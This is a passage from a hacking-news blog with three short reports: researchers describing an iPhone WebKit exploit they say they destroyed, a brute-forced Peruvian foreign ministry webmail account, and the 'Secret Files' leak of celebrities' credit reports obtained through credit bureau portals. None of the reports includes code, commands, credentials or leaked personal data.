"It took about three weeks, starting from scratch, and we were only working on our private time," says Joost Pol (photo left), CEO of Certified Secure, a nine-person research outfit based in The Hague. Pol and his colleague Daan Keuper used code auditing techniques to ferret out the WebKit bug and then spent most of the three weeks chaining multiple clever techniques to get a "clean, working exploit." "We really wanted to see how much time it would take a motivated attacker to do a clean attack against your iPhone. For me, that was the motivation. The easy part was finding the WebKit zero-day," Pol said in an interview.  Once the vulnerability in WebKit was found, the hackers said they put many things together in about three weeks to write an exploit to hack the iPhone 4S. The two found that the exploit developed also worked for iOS 6 (released today) and all previous versions of iOS devices.
Although the successful attack exposed the entire address book, photo/video database and browsing history, Pol and Keuper said they did not have access to the SMS or e-mail database. "Those are not accessible and they're also encrypted," Keuper explained.
While Pol and Keuper could use the hack for harm, the two said the exploit has already been destroyed. Pol told : ”We shredded it from our machine. The story ends here, we’re not going to use this again. It’s time to look for a new challenge.” They further added that iOS is definitely the most secure mobile platform around thanks to Apple’s strict guidelines. 







SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Silvia Alfaro -Peruvian Ambassador of Bolivia Email-id Hacked By Spect

Posted by Avik Sarkar On 4/12/2012 04:01:00 pm

Silvia Alfaro Peruvian Ambassador of Bolivia Email-id Hacked By Spect 

Hackers targeted the official website of Ministry of Foreign Affairs of Peru. A hacker codenamed "Spect" who belongs to a newly formed hacker group named "T3am_Digi7al Revolution" took responsibility of hacking into the web-mail of Peru Ministry & Foreign Affairs. The hacker said that he managed to brute-force Ambassador of Bolivia's official email account and was able to dump all of his mails. Proof of hack submitted by the hacker:- 


The above screen-shots clearly indicating that the hacker indeed penetrated the security and manged to gain access. T3am_Digi7al Revolution also submitted several login details but due to privacy and security concern we are not exposing those credentials. If you talk about mail hack then we would like to give you reminder that couple of months ago Anonymous has hacked into the Syrian President Bashar Assad's E-mail-Id & exposed all the details. Also few weeks ago another hacktivist group named Teamgreyhat has hacked into the email id of Bangladesh Prime Minister. The last and major email hack has been done by Anonymous and the victim was Tunisia's ruling Ennahda party, including those of the prime minister. 


 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

'The Secret Files'- Hackers Exposed Personal Details of Celebrities, Public Figure, FBI Director & National Leaders

Posted by Avik Sarkar On 3/18/2013 04:15:00 am

'The Secret Files'- Hackers Exposed Personal Details of Celebrities, Public Figure, FBI Director & National Leaders 

Yet again celebrities fallen victim to cyber attack, no this time not the nude photo but confidential personal information. Renowned public figure, national leaders, celebrities like Kim Kardashian, US Vice President Joe Biden, Hillary Clinton, Mel Gibson, Michelle Obama, Ashton Kutcher, Jay Z, BeyoncĂ©, Paris Hilton, Britney Spears, Sarah Palin, Hulk Hogan, Donald Trump and Arnold Schwarzenegger together became prey. The list does not end here, the hacker catches two more big fishes in his net and they are head of the Los Angeles police force Charlie Beck and FBI Director Robert Mueller. Many of you might be astonished of how such big public figure, including Vice President, FBI Director became victim in single round of cyber attack! Let me tell you what exactly happened- the hacked data dubbed "The Secret Files" by the hackers contains personal information and credit reports (including social security numbers, details of their mortgages, addresses, and details of their credit card and banking details) was made public by those hackers on a new website, as shown in the picture below. 

The hacker left a message or in other word a satire while saying "The Secret Files - If you believe that God makes miracles, you have to wonder if Satan has a few up his sleeve." Such hack, is very rare, where numbers of big fish get caught. The nature of this hack can be categorized as a clear identity theft. But the question is how? Well the answer is some of the United States' top credit bureaus have come forward and acknowledged that fraudulent and unauthorized access to the records of well-known figures have taken place. Most of the reports were apparently obtained from one of the three major U.S. credit ratings agencies Equifax, TransUnion and Experian — via a special Internet portal they maintain for the public to check their own credit ratings. All three companies have said that some of their reports had been fraudulently accessed since Monday by someone using personal data about the victims. Security experts said that suggests the attack is a “social hack” rather than a classic cyber security data breach


-Source (Sophos & WT)




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...

Site search